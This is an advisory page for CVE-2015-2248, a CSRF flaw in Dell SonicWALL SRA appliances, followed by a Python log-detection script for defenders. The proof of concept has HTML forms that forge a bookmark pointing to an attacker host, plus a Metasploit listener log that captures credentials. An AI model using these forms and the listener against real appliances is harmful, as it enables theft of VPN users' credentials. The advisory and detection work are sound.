| Reporter | Title | Published | Views |
|---|---|---|---|
| cnvd | Dell SonicWALL Secure Remote Access Cross-Site Request Forgery Vulnerability | 3 May 2015 00:00 | – |
| cve | CVE-2015-2248 | 1 May 2015 15:00 | – |
| cvelist | CVE-2015-2248 | 1 May 2015 15:00 | – |
| euvd | EUVD-2015-2354 | 7 Oct 2025 00:30 | – |
| nvd | CVE-2015-2248 | 1 May 2015 15:59 | – |
| openvas | Dell SonicWALL SMA 100 / SRA Series CSRF Vulnerability (SNWLID-2015-0001) | 8 Feb 2017 00:00 | – |
| prion | Cross site request forgery (csrf) | 1 May 2015 15:59 | – |
| sonicwall | Dell SonicWALL Secure Remote Access Products CVE-2015-2248 Cross Site Request Forgery Vulnerability | 1 May 2015 15:59 | – |

```
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
# Date: 04/28/2015
# Vendor Homepage: www.dell.com
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
# CVE : 2015-2248
```

Exploitation Procedure (Outline):

1. Use CSRF to force the currently logged-in user to create a bookmark pointing to an endpoint controlled by the attacker.
2. Use a subsequent request to call the bookmark just created. The identifier of the bookmark can be brute-forced using a single decrementing integer and causes minimal time delay.
3. Gather the credentials on the target server provided in step #1.

Step 1. Create a bookmark:

```html
<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
<input type="hidden" name="bmName" value="foo" />
<input type="hidden" name="host" value="www.malicious-host.tld" />
<input type="hidden" name="description" value="bar" />
<input type="hidden" name="tabs" value="Baz" />
<input type="hidden" name="service" value="HTTP" />
<input type="hidden" name="fbaSSOEnabled" value="on" />
<input type="hidden" name="fbaSSOFormUserName" value="user" />
<input type="hidden" name="fbaSSOFormUserPassword" value="password" />
<input type="hidden" name="MC_App" value="inherit" />
<input type="hidden" name="MC_Copy" value="inherit" />
<input type="hidden" name="MC_Print" value="inherit" />
<input type="hidden" name="MC_Offline" value="inherit" />
<input type="hidden" name="name" value="name" />
<input type="hidden" name="type" value="type" />
<input type="hidden" name="owner" value="owner" />
<input type="hidden" name="cmd" value="add" />
<input type="hidden" name="wantBmData" value="true" />
<input type="hidden" name="ok" value="OK" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

Step 2. Call the newly created bookmark:

This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.

```html
<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
<input type="hidden" name="HOST" value="www.malicious-host.tld" />
<input type="hidden" name="bookmarkAccessed" value="4" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

Step 3. Set up a listener:

E.g. Metasploit payload

```
use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:80...
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://www.malicious-host.tld:80/
[*] Server started.
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"
```
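For defenders, the two requests in the outline leave a recognisable trace in web logs. The following detection sketch is an added example, not part of the original advisory or of any vendor tooling. It assumes access logs in Combined Log Format from a reverse proxy in front of the appliance; the function names, the threshold and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

APPLIANCE_HOST = "vulnerable.vpn-installation.tld"  # placeholder host from the advisory
ENUM_THRESHOLD = 3  # assumed: distinct bookmark ids from one client before flagging

# Assumed format: ip - user [time] "METHOD target PROTO" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')

def cross_site(referer):
    """True when the Referer is absent or names a host other than the appliance."""
    host = None if referer in ("", "-") else urlsplit(referer).hostname
    return host != APPLIANCE_HOST

def find_csrf_indicators(lines):
    """Return sorted (client_ip, reason) pairs for the two request shapes in the advisory."""
    findings, tried = set(), {}  # tried: client ip -> distinct bookmarkAccessed values
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not cross_site(m["referer"]):
            continue  # unparsable, or issued from the appliance's own pages
        url = urlsplit(m["target"])
        query = parse_qs(url.query)
        if url.path == "/cgi-bin/editBookmark" and m["method"] == "POST":
            findings.add((m["ip"], "cross-site bookmark creation"))
        elif url.path == "/cgi-bin/http" and "bookmarkAccessed" in query:
            tried.setdefault(m["ip"], set()).update(query["bookmarkAccessed"])
    for ip, ids in tried.items():
        if len(ids) >= ENUM_THRESHOLD:
            findings.add((ip, "cross-site bookmark id guessing"))
    return sorted(findings)

def log_line(ip, request, referer):
    return f'{ip} - - [28/Apr/2015:10:00:00 +0000] "{request} HTTP/1.1" 200 512 "{referer}" "Mozilla/5.0"'

# Constructed sample lines (not captured traffic); client IPs are documentation ranges.
OWN, FOREIGN = f"https://{APPLIANCE_HOST}/", "http://www.malicious-host.tld/"
SAMPLE_LOG = [
    log_line("203.0.113.7", "POST /cgi-bin/editBookmark", OWN),       # user's own edit
    log_line("203.0.113.7", "GET /cgi-bin/http?HOST=intranet.example&bookmarkAccessed=2", OWN),
    log_line("198.51.100.23", "POST /cgi-bin/editBookmark", FOREIGN),  # forged creation
] + [
    log_line("198.51.100.23", f"GET /cgi-bin/http?HOST=www.malicious-host.tld&bookmarkAccessed={n}", FOREIGN)
    for n in (6, 5, 4)  # decrementing identifier, as in step 2 of the outline
]

if __name__ == "__main__":
    print(*find_csrf_indicators(SAMPLE_LOG), sep="\n")
```

A missing Referer is flagged as well, so treat those hits as lower confidence than a foreign Referer. The reported IP is the affected user's client, which identifies the session whose bookmarks and stored credentials should be reviewed.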